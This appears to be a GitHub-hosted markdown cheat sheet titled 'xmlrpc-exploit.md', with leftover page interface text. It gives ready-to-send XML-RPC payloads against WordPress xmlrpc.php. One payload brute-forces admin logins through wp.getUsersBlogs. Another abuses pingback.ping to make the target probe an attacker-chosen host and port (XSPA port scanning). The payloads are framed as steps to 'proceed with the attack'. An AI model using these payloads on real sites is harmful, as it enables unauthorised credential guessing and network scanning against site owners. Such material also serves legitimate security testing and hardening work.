Method 1 - Brute force

list all methods

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Search for the following , if you find that they are available then we can proceed with the attack *)wp.getUserBlogs *)wp.getCategories *)metaWeblog.getUsersBlogs

perform the bruteforce login

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

Method 2 - XSPA or simply port scanning

List all the methods and search for the following ‘pingback.ping’

Start your server and send the following request in post data

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

Source: https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

xmlrpc-exploit.md

xmlrpc-exploit.md

Method 1 - Brute force

Method 2 - XSPA or simply port scanning

Files

xmlrpc-exploit.md

Latest commit

History

xmlrpc-exploit.md

File metadata and controls

Method 1 - Brute force

Method 2 - XSPA or simply port scanning